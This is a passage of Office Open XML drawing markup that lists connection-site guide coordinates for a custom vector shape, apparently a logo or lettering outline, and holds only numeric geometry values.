                <a:gd name="connsiteX107" fmla="*/ 216999 w 476571"/>
                <a:gd name="connsiteY107" fmla="*/ 245162 h 430935"/>
                <a:gd name="connsiteX108" fmla="*/ 216997 w 476571"/>
                <a:gd name="connsiteY108" fmla="*/ 245092 h 430935"/>
                <a:gd name="connsiteX109" fmla="*/ 225019 w 476571"/>
                <a:gd name="connsiteY109" fmla="*/ 236682 h 430935"/>
                <a:gd name="connsiteX110" fmla="*/ 261075 w 476571"/>
                <a:gd name="connsiteY110" fmla="*/ 236558 h 430935"/>
                <a:gd name="connsiteX111" fmla="*/ 261075 w 476571"/>
                <a:gd name="connsiteY111" fmla="*/ 239176 h 430935"/>
                <a:gd name="connsiteX112" fmla="*/ 260888 w 476571"/>
                <a:gd name="connsiteY112" fmla="*/ 239176 h 430935"/>
                <a:gd name="connsiteX113" fmla="*/ 254622 w 476571"/>
                <a:gd name="connsiteY113" fmla="*/ 246596 h 430935"/>
                <a:gd name="connsiteX114" fmla="*/ 254622 w 476571"/>
                <a:gd name="connsiteY114" fmla="*/ 253174 h 430935"/>
                <a:gd name="connsiteX115" fmla="*/ 252273 w 476571"/>
                <a:gd name="connsiteY115" fmla="*/ 253174 h 430935"/>
                <a:gd name="connsiteX116" fmla="*/ 252273 w 476571"/>
                <a:gd name="connsiteY116" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX117" fmla="*/ 254622 w 476571"/>
                <a:gd name="connsiteY117" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX118" fmla="*/ 254622 w 476571"/>
                <a:gd name="connsiteY118" fmla="*/ 241078 h 430935"/>
                <a:gd name="connsiteX119" fmla="*/ 261075 w 476571"/>
                <a:gd name="connsiteY119" fmla="*/ 236558 h 430935"/>
                <a:gd name="connsiteX120" fmla="*/ 207351 w 476571"/>
                <a:gd name="connsiteY120" fmla="*/ 236495 h 430935"/>
                <a:gd name="connsiteX121" fmla="*/ 214744 w 476571"/>
                <a:gd name="connsiteY121" fmla="*/ 245006 h 430935"/>
                <a:gd name="connsiteX122" fmla="*/ 214744 w 476571"/>
                <a:gd name="connsiteY122" fmla="*/ 245785 h 430935"/>
                <a:gd name="connsiteX123" fmla="*/ 202213 w 476571"/>
                <a:gd name="connsiteY123" fmla="*/ 245785 h 430935"/>
                <a:gd name="connsiteX124" fmla="*/ 207727 w 476571"/>
                <a:gd name="connsiteY124" fmla="*/ 251272 h 430935"/>
                <a:gd name="connsiteX125" fmla="*/ 212645 w 476571"/>
                <a:gd name="connsiteY125" fmla="*/ 248997 h 430935"/>
                <a:gd name="connsiteX126" fmla="*/ 214086 w 476571"/>
                <a:gd name="connsiteY126" fmla="*/ 250337 h 430935"/>
                <a:gd name="connsiteX127" fmla="*/ 207323 w 476571"/>
                <a:gd name="connsiteY127" fmla="*/ 253359 h 430935"/>
                <a:gd name="connsiteX128" fmla="*/ 199832 w 476571"/>
                <a:gd name="connsiteY128" fmla="*/ 244944 h 430935"/>
                <a:gd name="connsiteX129" fmla="*/ 199821 w 476571"/>
                <a:gd name="connsiteY129" fmla="*/ 244758 h 430935"/>
                <a:gd name="connsiteX130" fmla="*/ 207351 w 476571"/>
                <a:gd name="connsiteY130" fmla="*/ 236495 h 430935"/>
                <a:gd name="connsiteX131" fmla="*/ 271821 w 476571"/>
                <a:gd name="connsiteY131" fmla="*/ 231944 h 430935"/>
                <a:gd name="connsiteX132" fmla="*/ 274139 w 476571"/>
                <a:gd name="connsiteY132" fmla="*/ 231944 h 430935"/>
                <a:gd name="connsiteX133" fmla="*/ 274139 w 476571"/>
                <a:gd name="connsiteY133" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX134" fmla="*/ 279120 w 476571"/>
                <a:gd name="connsiteY134" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX135" fmla="*/ 279120 w 476571"/>
                <a:gd name="connsiteY135" fmla="*/ 239114 h 430935"/>
                <a:gd name="connsiteX136" fmla="*/ 274139 w 476571"/>
                <a:gd name="connsiteY136" fmla="*/ 239114 h 430935"/>
                <a:gd name="connsiteX137" fmla="*/ 274139 w 476571"/>
                <a:gd name="connsiteY137" fmla="*/ 248467 h 430935"/>
                <a:gd name="connsiteX138" fmla="*/ 274131 w 476571"/>
                <a:gd name="connsiteY138" fmla="*/ 249139 h 430935"/>
                <a:gd name="connsiteX139" fmla="*/ 276770 w 476571"/>
                <a:gd name="connsiteY139" fmla="*/ 251148 h 430935"/>
                <a:gd name="connsiteX140" fmla="*/ 279057 w 476571"/>
                <a:gd name="connsiteY140" fmla="*/ 250586 h 430935"/>
                <a:gd name="connsiteX141" fmla="*/ 279057 w 476571"/>
                <a:gd name="connsiteY141" fmla="*/ 252675 h 430935"/>
                <a:gd name="connsiteX142" fmla="*/ 276238 w 476571"/>
                <a:gd name="connsiteY142" fmla="*/ 253361 h 430935"/>
                <a:gd name="connsiteX143" fmla="*/ 275305 w 476571"/>
                <a:gd name="connsiteY143" fmla="*/ 253342 h 430935"/>
                <a:gd name="connsiteX144" fmla="*/ 271821 w 476571"/>
                <a:gd name="connsiteY144" fmla="*/ 248779 h 430935"/>
                <a:gd name="connsiteX145" fmla="*/ 271821 w 476571"/>
                <a:gd name="connsiteY145" fmla="*/ 239083 h 430935"/>
                <a:gd name="connsiteX146" fmla="*/ 269628 w 476571"/>
                <a:gd name="connsiteY146" fmla="*/ 239083 h 430935"/>
                <a:gd name="connsiteX147" fmla="*/ 269628 w 476571"/>
                <a:gd name="connsiteY147" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX148" fmla="*/ 271821 w 476571"/>
                <a:gd name="connsiteY148" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX149" fmla="*/ 188993 w 476571"/>
                <a:gd name="connsiteY149" fmla="*/ 230696 h 430935"/>
                <a:gd name="connsiteX150" fmla="*/ 196574 w 476571"/>
                <a:gd name="connsiteY150" fmla="*/ 233533 h 430935"/>
                <a:gd name="connsiteX151" fmla="*/ 195196 w 476571"/>
                <a:gd name="connsiteY151" fmla="*/ 235466 h 430935"/>
                <a:gd name="connsiteX152" fmla="*/ 188931 w 476571"/>
                <a:gd name="connsiteY152" fmla="*/ 233066 h 430935"/>
                <a:gd name="connsiteX153" fmla="*/ 184420 w 476571"/>
                <a:gd name="connsiteY153" fmla="*/ 236620 h 430935"/>
                <a:gd name="connsiteX154" fmla="*/ 190184 w 476571"/>
                <a:gd name="connsiteY154" fmla="*/ 240891 h 430935"/>
                <a:gd name="connsiteX155" fmla="*/ 197075 w 476571"/>
                <a:gd name="connsiteY155" fmla="*/ 247063 h 430935"/>
                <a:gd name="connsiteX156" fmla="*/ 197029 w 476571"/>
                <a:gd name="connsiteY156" fmla="*/ 247705 h 430935"/>
                <a:gd name="connsiteX157" fmla="*/ 189839 w 476571"/>
                <a:gd name="connsiteY157" fmla="*/ 253298 h 430935"/>
                <a:gd name="connsiteX158" fmla="*/ 181193 w 476571"/>
                <a:gd name="connsiteY158" fmla="*/ 249776 h 430935"/>
                <a:gd name="connsiteX159" fmla="*/ 182665 w 476571"/>
                <a:gd name="connsiteY159" fmla="*/ 247968 h 430935"/>
                <a:gd name="connsiteX160" fmla="*/ 189933 w 476571"/>
                <a:gd name="connsiteY160" fmla="*/ 251085 h 430935"/>
                <a:gd name="connsiteX161" fmla="*/ 194663 w 476571"/>
                <a:gd name="connsiteY161" fmla="*/ 247344 h 430935"/>
                <a:gd name="connsiteX162" fmla="*/ 189150 w 476571"/>
                <a:gd name="connsiteY162" fmla="*/ 243167 h 430935"/>
                <a:gd name="connsiteX163" fmla="*/ 182039 w 476571"/>
                <a:gd name="connsiteY163" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX164" fmla="*/ 182077 w 476571"/>
                <a:gd name="connsiteY164" fmla="*/ 236208 h 430935"/>
                <a:gd name="connsiteX165" fmla="*/ 188993 w 476571"/>
                <a:gd name="connsiteY165" fmla="*/ 230696 h 430935"/>
                <a:gd name="connsiteX166" fmla="*/ 263832 w 476571"/>
                <a:gd name="connsiteY166" fmla="*/ 230634 h 430935"/>
                <a:gd name="connsiteX167" fmla="*/ 266495 w 476571"/>
                <a:gd name="connsiteY167" fmla="*/ 230634 h 430935"/>
                <a:gd name="connsiteX168" fmla="*/ 266495 w 476571"/>
                <a:gd name="connsiteY168" fmla="*/ 233315 h 430935"/>
                <a:gd name="connsiteX169" fmla="*/ 263832 w 476571"/>
                <a:gd name="connsiteY169" fmla="*/ 233315 h 430935"/>
                <a:gd name="connsiteX170" fmla="*/ 294846 w 476571"/>
                <a:gd name="connsiteY170" fmla="*/ 207377 h 430935"/>
                <a:gd name="connsiteX171" fmla="*/ 290303 w 476571"/>
                <a:gd name="connsiteY171" fmla="*/ 210713 h 430935"/>
                <a:gd name="connsiteX172" fmla="*/ 290312 w 476571"/>
                <a:gd name="connsiteY172" fmla="*/ 210788 h 430935"/>
                <a:gd name="connsiteX173" fmla="*/ 294219 w 476571"/>
                <a:gd name="connsiteY173" fmla="*/ 213831 h 430935"/>
                <a:gd name="connsiteX174" fmla="*/ 294380 w 476571"/>
                <a:gd name="connsiteY174" fmla="*/ 213844 h 430935"/>
                <a:gd name="connsiteX175" fmla="*/ 299451 w 476571"/>
                <a:gd name="connsiteY175" fmla="*/ 209435 h 430935"/>
                <a:gd name="connsiteX176" fmla="*/ 299451 w 476571"/>
                <a:gd name="connsiteY176" fmla="*/ 208064 h 430935"/>
                <a:gd name="connsiteX177" fmla="*/ 294846 w 476571"/>
                <a:gd name="connsiteY177" fmla="*/ 207377 h 430935"/>
                <a:gd name="connsiteX178" fmla="*/ 331560 w 476571"/>
                <a:gd name="connsiteY178" fmla="*/ 201142 h 430935"/>
                <a:gd name="connsiteX179" fmla="*/ 331454 w 476571"/>
                <a:gd name="connsiteY179" fmla="*/ 201147 h 430935"/>
                <a:gd name="connsiteX180" fmla="*/ 325828 w 476571"/>
                <a:gd name="connsiteY180" fmla="*/ 207377 h 430935"/>
                <a:gd name="connsiteX181" fmla="*/ 325824 w 476571"/>
                <a:gd name="connsiteY181" fmla="*/ 207481 h 430935"/>
                <a:gd name="connsiteX182" fmla="*/ 331623 w 476571"/>
                <a:gd name="connsiteY182" fmla="*/ 213613 h 430935"/>
                <a:gd name="connsiteX183" fmla="*/ 331856 w 476571"/>
                <a:gd name="connsiteY183" fmla="*/ 213603 h 430935"/>
                <a:gd name="connsiteX184" fmla="*/ 337356 w 476571"/>
                <a:gd name="connsiteY184" fmla="*/ 207377 h 430935"/>
                <a:gd name="connsiteX185" fmla="*/ 331560 w 476571"/>
                <a:gd name="connsiteY185" fmla="*/ 201142 h 430935"/>
                <a:gd name="connsiteX186" fmla="*/ 176556 w 476571"/>
                <a:gd name="connsiteY186" fmla="*/ 201080 h 430935"/>
                <a:gd name="connsiteX187" fmla="*/ 170886 w 476571"/>
                <a:gd name="connsiteY187" fmla="*/ 207315 h 430935"/>
                <a:gd name="connsiteX188" fmla="*/ 170884 w 476571"/>
                <a:gd name="connsiteY188" fmla="*/ 207361 h 430935"/>
                <a:gd name="connsiteX189" fmla="*/ 176556 w 476571"/>
                <a:gd name="connsiteY189" fmla="*/ 213550 h 430935"/>
                <a:gd name="connsiteX190" fmla="*/ 177028 w 476571"/>
                <a:gd name="connsiteY190" fmla="*/ 213520 h 430935"/>
                <a:gd name="connsiteX191" fmla="*/ 182070 w 476571"/>
                <a:gd name="connsiteY191" fmla="*/ 207315 h 430935"/>
                <a:gd name="connsiteX192" fmla="*/ 182084 w 476571"/>
                <a:gd name="connsiteY192" fmla="*/ 207103 h 430935"/>
                <a:gd name="connsiteX193" fmla="*/ 176556 w 476571"/>
                <a:gd name="connsiteY193" fmla="*/ 201080 h 430935"/>
                <a:gd name="connsiteX194" fmla="*/ 227368 w 476571"/>
                <a:gd name="connsiteY194" fmla="*/ 201018 h 430935"/>
                <a:gd name="connsiteX195" fmla="*/ 221729 w 476571"/>
                <a:gd name="connsiteY195" fmla="*/ 207253 h 430935"/>
                <a:gd name="connsiteX196" fmla="*/ 221728 w 476571"/>
                <a:gd name="connsiteY196" fmla="*/ 207269 h 430935"/>
                <a:gd name="connsiteX197" fmla="*/ 227368 w 476571"/>
                <a:gd name="connsiteY197" fmla="*/ 213488 h 430935"/>
                <a:gd name="connsiteX198" fmla="*/ 227905 w 476571"/>
                <a:gd name="connsiteY198" fmla="*/ 213454 h 430935"/>
                <a:gd name="connsiteX199" fmla="*/ 232882 w 476571"/>
                <a:gd name="connsiteY199" fmla="*/ 207253 h 430935"/>
                <a:gd name="connsiteX200" fmla="*/ 232895 w 476571"/>
                <a:gd name="connsiteY200" fmla="*/ 207040 h 430935"/>
                <a:gd name="connsiteX201" fmla="*/ 227368 w 476571"/>
                <a:gd name="connsiteY201" fmla="*/ 201018 h 430935"/>
                <a:gd name="connsiteX202" fmla="*/ 246728 w 476571"/>
                <a:gd name="connsiteY202" fmla="*/ 200987 h 430935"/>
                <a:gd name="connsiteX203" fmla="*/ 241058 w 476571"/>
                <a:gd name="connsiteY203" fmla="*/ 207222 h 430935"/>
                <a:gd name="connsiteX204" fmla="*/ 241056 w 476571"/>
                <a:gd name="connsiteY204" fmla="*/ 207268 h 430935"/>
                <a:gd name="connsiteX205" fmla="*/ 246728 w 476571"/>
                <a:gd name="connsiteY205" fmla="*/ 213457 h 430935"/>
                <a:gd name="connsiteX206" fmla="*/ 247265 w 476571"/>
                <a:gd name="connsiteY206" fmla="*/ 213423 h 430935"/>
                <a:gd name="connsiteX207" fmla="*/ 252241 w 476571"/>
                <a:gd name="connsiteY207" fmla="*/ 207222 h 430935"/>
                <a:gd name="connsiteX208" fmla="*/ 252255 w 476571"/>
                <a:gd name="connsiteY208" fmla="*/ 207009 h 430935"/>
                <a:gd name="connsiteX209" fmla="*/ 246728 w 476571"/>
                <a:gd name="connsiteY209" fmla="*/ 200987 h 430935"/>
                <a:gd name="connsiteX210" fmla="*/ 157949 w 476571"/>
                <a:gd name="connsiteY210" fmla="*/ 200862 h 430935"/>
                <a:gd name="connsiteX211" fmla="*/ 152874 w 476571"/>
                <a:gd name="connsiteY211" fmla="*/ 206411 h 430935"/>
                <a:gd name="connsiteX212" fmla="*/ 162961 w 476571"/>
                <a:gd name="connsiteY212" fmla="*/ 206411 h 430935"/>
                <a:gd name="connsiteX213" fmla="*/ 157949 w 476571"/>
                <a:gd name="connsiteY213" fmla="*/ 200862 h 430935"/>
                <a:gd name="connsiteX214" fmla="*/ 317432 w 476571"/>
                <a:gd name="connsiteY214" fmla="*/ 199178 h 430935"/>
                <a:gd name="connsiteX215" fmla="*/ 319750 w 476571"/>
                <a:gd name="connsiteY215" fmla="*/ 199178 h 430935"/>
                <a:gd name="connsiteX216" fmla="*/ 319750 w 476571"/>
                <a:gd name="connsiteY216" fmla="*/ 215421 h 430935"/>
                <a:gd name="connsiteX217" fmla="*/ 317432 w 476571"/>
                <a:gd name="connsiteY217" fmla="*/ 215421 h 430935"/>
                <a:gd name="connsiteX218" fmla="*/ 265587 w 476571"/>
                <a:gd name="connsiteY218" fmla="*/ 199178 h 430935"/>
                <a:gd name="connsiteX219" fmla="*/ 267905 w 476571"/>
                <a:gd name="connsiteY219" fmla="*/ 199178 h 430935"/>
                <a:gd name="connsiteX220" fmla="*/ 267905 w 476571"/>
                <a:gd name="connsiteY220" fmla="*/ 215421 h 430935"/>
                <a:gd name="connsiteX221" fmla="*/ 265587 w 476571"/>
                <a:gd name="connsiteY221" fmla="*/ 215421 h 430935"/>
                <a:gd name="connsiteX222" fmla="*/ 279621 w 476571"/>
                <a:gd name="connsiteY222" fmla="*/ 199023 h 430935"/>
                <a:gd name="connsiteX223" fmla="*/ 285886 w 476571"/>
                <a:gd name="connsiteY223" fmla="*/ 201922 h 430935"/>
                <a:gd name="connsiteX224" fmla="*/ 284351 w 476571"/>
                <a:gd name="connsiteY224" fmla="*/ 203605 h 430935"/>
                <a:gd name="connsiteX225" fmla="*/ 279590 w 476571"/>
                <a:gd name="connsiteY225" fmla="*/ 201142 h 430935"/>
                <a:gd name="connsiteX226" fmla="*/ 279569 w 476571"/>
                <a:gd name="connsiteY226" fmla="*/ 201144 h 430935"/>
                <a:gd name="connsiteX227" fmla="*/ 274013 w 476571"/>
                <a:gd name="connsiteY227" fmla="*/ 207377 h 430935"/>
                <a:gd name="connsiteX228" fmla="*/ 274009 w 476571"/>
                <a:gd name="connsiteY228" fmla="*/ 207483 h 430935"/>
                <a:gd name="connsiteX229" fmla="*/ 279746 w 476571"/>
                <a:gd name="connsiteY229" fmla="*/ 213613 h 430935"/>
                <a:gd name="connsiteX230" fmla="*/ 284539 w 476571"/>
                <a:gd name="connsiteY230" fmla="*/ 211212 h 430935"/>
                <a:gd name="connsiteX231" fmla="*/ 286011 w 476571"/>
                <a:gd name="connsiteY231" fmla="*/ 212647 h 430935"/>
                <a:gd name="connsiteX232" fmla="*/ 279621 w 476571"/>
                <a:gd name="connsiteY232" fmla="*/ 215733 h 430935"/>
                <a:gd name="connsiteX233" fmla="*/ 279552 w 476571"/>
                <a:gd name="connsiteY233" fmla="*/ 215731 h 430935"/>
                <a:gd name="connsiteX234" fmla="*/ 271601 w 476571"/>
                <a:gd name="connsiteY234" fmla="*/ 207315 h 430935"/>
                <a:gd name="connsiteX235" fmla="*/ 279621 w 476571"/>
                <a:gd name="connsiteY235" fmla="*/ 199023 h 430935"/>
                <a:gd name="connsiteX236" fmla="*/ 296473 w 476571"/>
                <a:gd name="connsiteY236" fmla="*/ 198946 h 430935"/>
                <a:gd name="connsiteX237" fmla="*/ 301675 w 476571"/>
                <a:gd name="connsiteY237" fmla="*/ 205476 h 430935"/>
                <a:gd name="connsiteX238" fmla="*/ 301675 w 476571"/>
                <a:gd name="connsiteY238" fmla="*/ 215359 h 430935"/>
                <a:gd name="connsiteX239" fmla="*/ 299419 w 476571"/>
                <a:gd name="connsiteY239" fmla="*/ 215359 h 430935"/>
                <a:gd name="connsiteX240" fmla="*/ 299419 w 476571"/>
                <a:gd name="connsiteY240" fmla="*/ 212896 h 430935"/>
                <a:gd name="connsiteX241" fmla="*/ 293781 w 476571"/>
                <a:gd name="connsiteY241" fmla="*/ 215702 h 430935"/>
                <a:gd name="connsiteX242" fmla="*/ 293501 w 476571"/>
                <a:gd name="connsiteY242" fmla="*/ 215721 h 430935"/>
                <a:gd name="connsiteX243" fmla="*/ 287923 w 476571"/>
                <a:gd name="connsiteY243" fmla="*/ 210620 h 430935"/>
                <a:gd name="connsiteX244" fmla="*/ 294626 w 476571"/>
                <a:gd name="connsiteY244" fmla="*/ 205382 h 430935"/>
                <a:gd name="connsiteX245" fmla="*/ 299419 w 476571"/>
                <a:gd name="connsiteY245" fmla="*/ 206068 h 430935"/>
                <a:gd name="connsiteX246" fmla="*/ 299419 w 476571"/>
                <a:gd name="connsiteY246" fmla="*/ 205507 h 430935"/>
                <a:gd name="connsiteX247" fmla="*/ 299400 w 476571"/>
                <a:gd name="connsiteY247" fmla="*/ 204579 h 430935"/>
                <a:gd name="connsiteX248" fmla="*/ 294783 w 476571"/>
                <a:gd name="connsiteY248" fmla="*/ 201080 h 430935"/>
                <a:gd name="connsiteX249" fmla="*/ 290022 w 476571"/>
                <a:gd name="connsiteY249" fmla="*/ 202296 h 430935"/>
                <a:gd name="connsiteX250" fmla="*/ 289332 w 476571"/>
                <a:gd name="connsiteY250" fmla="*/ 200301 h 430935"/>
                <a:gd name="connsiteX251" fmla="*/ 295002 w 476571"/>
                <a:gd name="connsiteY251" fmla="*/ 198960 h 430935"/>
                <a:gd name="connsiteX252" fmla="*/ 296473 w 476571"/>
                <a:gd name="connsiteY252" fmla="*/ 198946 h 430935"/>
                <a:gd name="connsiteX253" fmla="*/ 247198 w 476571"/>
                <a:gd name="connsiteY253" fmla="*/ 198898 h 430935"/>
                <a:gd name="connsiteX254" fmla="*/ 247512 w 476571"/>
                <a:gd name="connsiteY254" fmla="*/ 198917 h 430935"/>
                <a:gd name="connsiteX255" fmla="*/ 254685 w 476571"/>
                <a:gd name="connsiteY255" fmla="*/ 207315 h 430935"/>
                <a:gd name="connsiteX256" fmla="*/ 254703 w 476571"/>
                <a:gd name="connsiteY256" fmla="*/ 207598 h 430935"/>
                <a:gd name="connsiteX257" fmla="*/ 247198 w 476571"/>
                <a:gd name="connsiteY257" fmla="*/ 215764 h 430935"/>
                <a:gd name="connsiteX258" fmla="*/ 241215 w 476571"/>
                <a:gd name="connsiteY258" fmla="*/ 212304 h 430935"/>
                <a:gd name="connsiteX259" fmla="*/ 241215 w 476571"/>
                <a:gd name="connsiteY259" fmla="*/ 220440 h 430935"/>
                <a:gd name="connsiteX260" fmla="*/ 238834 w 476571"/>
                <a:gd name="connsiteY260" fmla="*/ 220440 h 430935"/>
                <a:gd name="connsiteX261" fmla="*/ 238834 w 476571"/>
                <a:gd name="connsiteY261" fmla="*/ 199178 h 430935"/>
                <a:gd name="connsiteX262" fmla="*/ 241215 w 476571"/>
                <a:gd name="connsiteY262" fmla="*/ 199334 h 430935"/>
                <a:gd name="connsiteX263" fmla="*/ 241215 w 476571"/>
                <a:gd name="connsiteY263" fmla="*/ 202452 h 430935"/>
                <a:gd name="connsiteX264" fmla="*/ 247198 w 476571"/>
                <a:gd name="connsiteY264" fmla="*/ 198898 h 430935"/>
                <a:gd name="connsiteX265" fmla="*/ 350858 w 476571"/>
                <a:gd name="connsiteY265" fmla="*/ 198836 h 430935"/>
                <a:gd name="connsiteX266" fmla="*/ 351713 w 476571"/>
                <a:gd name="connsiteY266" fmla="*/ 198870 h 430935"/>
                <a:gd name="connsiteX267" fmla="*/ 356872 w 476571"/>
                <a:gd name="connsiteY267" fmla="*/ 205320 h 430935"/>
                <a:gd name="connsiteX268" fmla="*/ 356872 w 476571"/>
                <a:gd name="connsiteY268" fmla="*/ 215203 h 430935"/>
                <a:gd name="connsiteX269" fmla="*/ 354523 w 476571"/>
                <a:gd name="connsiteY269" fmla="*/ 215203 h 430935"/>
                <a:gd name="connsiteX270" fmla="*/ 354523 w 476571"/>
                <a:gd name="connsiteY270" fmla="*/ 205850 h 430935"/>
                <a:gd name="connsiteX271" fmla="*/ 350200 w 476571"/>
                <a:gd name="connsiteY271" fmla="*/ 200955 h 430935"/>
                <a:gd name="connsiteX272" fmla="*/ 349806 w 476571"/>
                <a:gd name="connsiteY272" fmla="*/ 200973 h 430935"/>
                <a:gd name="connsiteX273" fmla="*/ 345501 w 476571"/>
                <a:gd name="connsiteY273" fmla="*/ 206068 h 430935"/>
                <a:gd name="connsiteX274" fmla="*/ 345501 w 476571"/>
                <a:gd name="connsiteY274" fmla="*/ 215421 h 430935"/>
                <a:gd name="connsiteX275" fmla="*/ 343183 w 476571"/>
                <a:gd name="connsiteY275" fmla="*/ 215421 h 430935"/>
                <a:gd name="connsiteX276" fmla="*/ 343183 w 476571"/>
                <a:gd name="connsiteY276" fmla="*/ 199116 h 430935"/>
                <a:gd name="connsiteX277" fmla="*/ 345501 w 476571"/>
                <a:gd name="connsiteY277" fmla="*/ 199116 h 430935"/>
                <a:gd name="connsiteX278" fmla="*/ 345501 w 476571"/>
                <a:gd name="connsiteY278" fmla="*/ 201953 h 430935"/>
                <a:gd name="connsiteX279" fmla="*/ 350858 w 476571"/>
                <a:gd name="connsiteY279" fmla="*/ 198836 h 430935"/>
                <a:gd name="connsiteX280" fmla="*/ 331623 w 476571"/>
                <a:gd name="connsiteY280" fmla="*/ 198836 h 430935"/>
                <a:gd name="connsiteX281" fmla="*/ 331815 w 476571"/>
                <a:gd name="connsiteY281" fmla="*/ 198839 h 430935"/>
                <a:gd name="connsiteX282" fmla="*/ 339768 w 476571"/>
                <a:gd name="connsiteY282" fmla="*/ 207253 h 430935"/>
                <a:gd name="connsiteX283" fmla="*/ 339770 w 476571"/>
                <a:gd name="connsiteY283" fmla="*/ 207381 h 430935"/>
                <a:gd name="connsiteX284" fmla="*/ 331560 w 476571"/>
                <a:gd name="connsiteY284" fmla="*/ 215733 h 430935"/>
                <a:gd name="connsiteX285" fmla="*/ 331399 w 476571"/>
                <a:gd name="connsiteY285" fmla="*/ 215730 h 430935"/>
                <a:gd name="connsiteX286" fmla="*/ 323447 w 476571"/>
                <a:gd name="connsiteY286" fmla="*/ 207315 h 430935"/>
                <a:gd name="connsiteX287" fmla="*/ 323443 w 476571"/>
                <a:gd name="connsiteY287" fmla="*/ 207155 h 430935"/>
                <a:gd name="connsiteX288" fmla="*/ 331623 w 476571"/>
                <a:gd name="connsiteY288" fmla="*/ 198836 h 430935"/>
                <a:gd name="connsiteX289" fmla="*/ 227806 w 476571"/>
                <a:gd name="connsiteY289" fmla="*/ 198836 h 430935"/>
                <a:gd name="connsiteX290" fmla="*/ 228121 w 476571"/>
                <a:gd name="connsiteY290" fmla="*/ 198855 h 430935"/>
                <a:gd name="connsiteX291" fmla="*/ 235294 w 476571"/>
                <a:gd name="connsiteY291" fmla="*/ 207253 h 430935"/>
                <a:gd name="connsiteX292" fmla="*/ 235294 w 476571"/>
                <a:gd name="connsiteY292" fmla="*/ 207315 h 430935"/>
                <a:gd name="connsiteX293" fmla="*/ 235311 w 476571"/>
                <a:gd name="connsiteY293" fmla="*/ 207598 h 430935"/>
                <a:gd name="connsiteX294" fmla="*/ 227807 w 476571"/>
                <a:gd name="connsiteY294" fmla="*/ 215764 h 430935"/>
                <a:gd name="connsiteX295" fmla="*/ 221792 w 476571"/>
                <a:gd name="connsiteY295" fmla="*/ 212304 h 430935"/>
                <a:gd name="connsiteX296" fmla="*/ 221792 w 476571"/>
                <a:gd name="connsiteY296" fmla="*/ 220596 h 430935"/>
                <a:gd name="connsiteX297" fmla="*/ 219474 w 476571"/>
                <a:gd name="connsiteY297" fmla="*/ 220596 h 430935"/>
                <a:gd name="connsiteX298" fmla="*/ 219474 w 476571"/>
                <a:gd name="connsiteY298" fmla="*/ 199335 h 430935"/>
                <a:gd name="connsiteX299" fmla="*/ 221792 w 476571"/>
                <a:gd name="connsiteY299" fmla="*/ 199335 h 430935"/>
                <a:gd name="connsiteX300" fmla="*/ 221792 w 476571"/>
                <a:gd name="connsiteY300" fmla="*/ 202452 h 430935"/>
                <a:gd name="connsiteX301" fmla="*/ 227806 w 476571"/>
                <a:gd name="connsiteY301" fmla="*/ 198836 h 430935"/>
                <a:gd name="connsiteX302" fmla="*/ 158011 w 476571"/>
                <a:gd name="connsiteY302" fmla="*/ 198836 h 430935"/>
                <a:gd name="connsiteX303" fmla="*/ 165279 w 476571"/>
                <a:gd name="connsiteY303" fmla="*/ 207284 h 430935"/>
                <a:gd name="connsiteX304" fmla="*/ 165279 w 476571"/>
                <a:gd name="connsiteY304" fmla="*/ 208064 h 430935"/>
                <a:gd name="connsiteX305" fmla="*/ 152748 w 476571"/>
                <a:gd name="connsiteY305" fmla="*/ 208064 h 430935"/>
                <a:gd name="connsiteX306" fmla="*/ 158262 w 476571"/>
                <a:gd name="connsiteY306" fmla="*/ 213551 h 430935"/>
                <a:gd name="connsiteX307" fmla="*/ 163180 w 476571"/>
                <a:gd name="connsiteY307" fmla="*/ 211275 h 430935"/>
                <a:gd name="connsiteX308" fmla="*/ 164652 w 476571"/>
                <a:gd name="connsiteY308" fmla="*/ 212615 h 430935"/>
                <a:gd name="connsiteX309" fmla="*/ 158199 w 476571"/>
                <a:gd name="connsiteY309" fmla="*/ 215733 h 430935"/>
                <a:gd name="connsiteX310" fmla="*/ 157838 w 476571"/>
                <a:gd name="connsiteY310" fmla="*/ 215718 h 430935"/>
                <a:gd name="connsiteX311" fmla="*/ 150367 w 476571"/>
                <a:gd name="connsiteY311" fmla="*/ 207284 h 430935"/>
                <a:gd name="connsiteX312" fmla="*/ 150351 w 476571"/>
                <a:gd name="connsiteY312" fmla="*/ 206979 h 430935"/>
                <a:gd name="connsiteX313" fmla="*/ 158011 w 476571"/>
                <a:gd name="connsiteY313" fmla="*/ 198836 h 430935"/>
                <a:gd name="connsiteX314" fmla="*/ 205628 w 476571"/>
                <a:gd name="connsiteY314" fmla="*/ 196155 h 430935"/>
                <a:gd name="connsiteX315" fmla="*/ 200803 w 476571"/>
                <a:gd name="connsiteY315" fmla="*/ 207378 h 430935"/>
                <a:gd name="connsiteX316" fmla="*/ 210452 w 476571"/>
                <a:gd name="connsiteY316" fmla="*/ 207378 h 430935"/>
                <a:gd name="connsiteX317" fmla="*/ 306562 w 476571"/>
                <a:gd name="connsiteY317" fmla="*/ 194284 h 430935"/>
                <a:gd name="connsiteX318" fmla="*/ 308880 w 476571"/>
                <a:gd name="connsiteY318" fmla="*/ 194284 h 430935"/>
                <a:gd name="connsiteX319" fmla="*/ 308880 w 476571"/>
                <a:gd name="connsiteY319" fmla="*/ 199178 h 430935"/>
                <a:gd name="connsiteX320" fmla="*/ 313861 w 476571"/>
                <a:gd name="connsiteY320" fmla="*/ 199178 h 430935"/>
                <a:gd name="connsiteX321" fmla="*/ 313861 w 476571"/>
                <a:gd name="connsiteY321" fmla="*/ 201298 h 430935"/>
                <a:gd name="connsiteX322" fmla="*/ 308880 w 476571"/>
                <a:gd name="connsiteY322" fmla="*/ 201298 h 430935"/>
                <a:gd name="connsiteX323" fmla="*/ 308880 w 476571"/>
                <a:gd name="connsiteY323" fmla="*/ 210807 h 430935"/>
                <a:gd name="connsiteX324" fmla="*/ 308872 w 476571"/>
                <a:gd name="connsiteY324" fmla="*/ 211479 h 430935"/>
                <a:gd name="connsiteX325" fmla="*/ 311511 w 476571"/>
                <a:gd name="connsiteY325" fmla="*/ 213488 h 430935"/>
                <a:gd name="connsiteX326" fmla="*/ 313798 w 476571"/>
                <a:gd name="connsiteY326" fmla="*/ 212927 h 430935"/>
                <a:gd name="connsiteX327" fmla="*/ 313798 w 476571"/>
